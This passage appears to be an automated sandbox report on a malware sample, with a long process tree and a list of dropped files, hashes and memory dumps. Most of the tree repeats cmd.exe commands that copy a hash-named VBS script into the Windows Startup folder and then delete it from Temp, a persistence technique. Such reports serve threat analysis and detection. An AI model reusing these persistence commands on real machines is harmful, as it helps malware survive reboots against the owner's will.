                              cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                              4⤵
                                PID:4692
                              • C:\Windows\SYSTEM32\cmd.exe
                                cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                4⤵
                                  PID:2664
                                • C:\Windows\SYSTEM32\cmd.exe
                                  cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                  4⤵
                                    PID:5036
                                  • C:\Windows\SYSTEM32\cmd.exe
                                    cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                    4⤵
                                      PID:556
                                    • C:\Windows\SYSTEM32\cmd.exe
                                      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                      4⤵
                                        PID:2676
                                      • C:\Windows\SYSTEM32\cmd.exe
                                        cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                        4⤵
                                          PID:5016
                                        • C:\Windows\SYSTEM32\cmd.exe
                                          cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                          4⤵
                                            PID:3808
                                          • C:\Windows\SYSTEM32\cmd.exe
                                            cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                            4⤵
                                              PID:4820
                                            • C:\Windows\SYSTEM32\cmd.exe
                                              cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                              4⤵
                                                PID:3936
                                              • C:\Windows\SYSTEM32\cmd.exe
                                                cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                4⤵
                                                  PID:1544
                                                • C:\Windows\SYSTEM32\cmd.exe
                                                  cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                  4⤵
                                                    PID:1376
                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                    cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                    4⤵
                                                      PID:4224
                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                      4⤵
                                                        PID:3812
                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                        cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                        4⤵
                                                          PID:1144
                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                          cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                          4⤵
                                                            PID:4596
                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                            cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                            4⤵
                                                              PID:3716
                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                              cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                              4⤵
                                                                PID:2824
                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                                4⤵
                                                                  PID:4980
                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                  cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                                  4⤵
                                                                    PID:3796
                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                    cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                                    4⤵
                                                                      PID:228
                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                                      4⤵
                                                                        PID:2996
                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                        cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                                        4⤵
                                                                          PID:660
                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                          cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                                          4⤵
                                                                            PID:4604
                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                            cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                                            4⤵
                                                                              PID:1300
                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                              cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                                              4⤵
                                                                                PID:4164
                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                                                4⤵
                                                                                  PID:3144
                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                  cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                                                  4⤵
                                                                                    PID:4828
                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                    cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                                                    4⤵
                                                                                      PID:1452
                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                                                      4⤵
                                                                                        PID:4080
                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                        cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                                                        4⤵
                                                                                          PID:1132
                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                          cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                                                          4⤵
                                                                                            PID:3468
                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                            cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                                                            4⤵
                                                                                              PID:1924
                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                              cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                                                              4⤵
                                                                                                PID:1252
                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                                                                4⤵
                                                                                                  PID:1140
                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                  cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                                                                  4⤵
                                                                                                    PID:3276
                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                    cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                                                                    4⤵
                                                                                                      PID:3536
                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                                                                                                      4⤵
                                                                                                        PID:3624

                                                                                                Network

                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                Replay Monitor

                                                                                                Loading Replay Monitor...

                                                                                                Downloads

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                  Filesize

                                                                                                  2KB

                                                                                                  MD5

                                                                                                  d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                  SHA1

                                                                                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                  SHA256

                                                                                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                  SHA512

                                                                                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

                                                                                                  Filesize

                                                                                                  336B

                                                                                                  MD5

                                                                                                  28d0bdd4a3c54dd65ef5413bc908bbaf

                                                                                                  SHA1

                                                                                                  8c9fb407f30d99e6b336e4540dabdd029659703c

                                                                                                  SHA256

                                                                                                  84a03b60597e923187e55d9a8a8a079954b21827ca12c9efc5927ec271ac97b2

                                                                                                  SHA512

                                                                                                  e23b8352d151fdd9fb55c473f473dbeae11cba076f454a466ec791dd0a8914671edab9ad9268eb5ad089eb2ffe5f3aa18f92048dfdcc6dd67236a4f26912a986

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.txt

                                                                                                  Filesize

                                                                                                  355B

                                                                                                  MD5

                                                                                                  daa58b938ebe73e880b2cdd8704c6301

                                                                                                  SHA1

                                                                                                  857c5eaf94dfeb56ba44ac70685c6787a846549c

                                                                                                  SHA256

                                                                                                  50bae474c92c50383c3e65183eed42e3c05d134b0baf0f5cf6f8095f362f5ee6

                                                                                                  SHA512

                                                                                                  53d127cf5afe697a77b9ff1658673295be80fbbcc24e8fa5b28d39ce7dd158ddfe1d7e756f189280fb965881a6ff1764ddb0e74325eb24574b1cb466039e999e

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                  Filesize

                                                                                                  944B

                                                                                                  MD5

                                                                                                  77d622bb1a5b250869a3238b9bc1402b

                                                                                                  SHA1

                                                                                                  d47f4003c2554b9dfc4c16f22460b331886b191b

                                                                                                  SHA256

                                                                                                  f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                                                                                  SHA512

                                                                                                  d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jl5h3qiq.s42.ps1

                                                                                                  Filesize

                                                                                                  60B

                                                                                                  MD5

                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                  SHA1

                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                  SHA256

                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                  SHA512

                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                • memory/2748-22-0x000001F9085E0000-0x000001F9085EA000-memory.dmp

                                                                                                  Filesize

                                                                                                  40KB

                                                                                                • memory/3648-0-0x00007FFBED9F3000-0x00007FFBED9F5000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/3648-1-0x0000028459A70000-0x0000028459A92000-memory.dmp

                                                                                                  Filesize

                                                                                                  136KB

                                                                                                • memory/3648-11-0x00007FFBED9F0000-0x00007FFBEE4B1000-memory.dmp

                                                                                                  Filesize

                                                                                                  10.8MB

                                                                                                • memory/3648-12-0x00007FFBED9F0000-0x00007FFBEE4B1000-memory.dmp

                                                                                                  Filesize

                                                                                                  10.8MB

                                                                                                • memory/3648-60-0x00007FFBED9F3000-0x00007FFBED9F5000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/3648-61-0x00007FFBED9F0000-0x00007FFBEE4B1000-memory.dmp

                                                                                                  Filesize

                                                                                                  10.8MB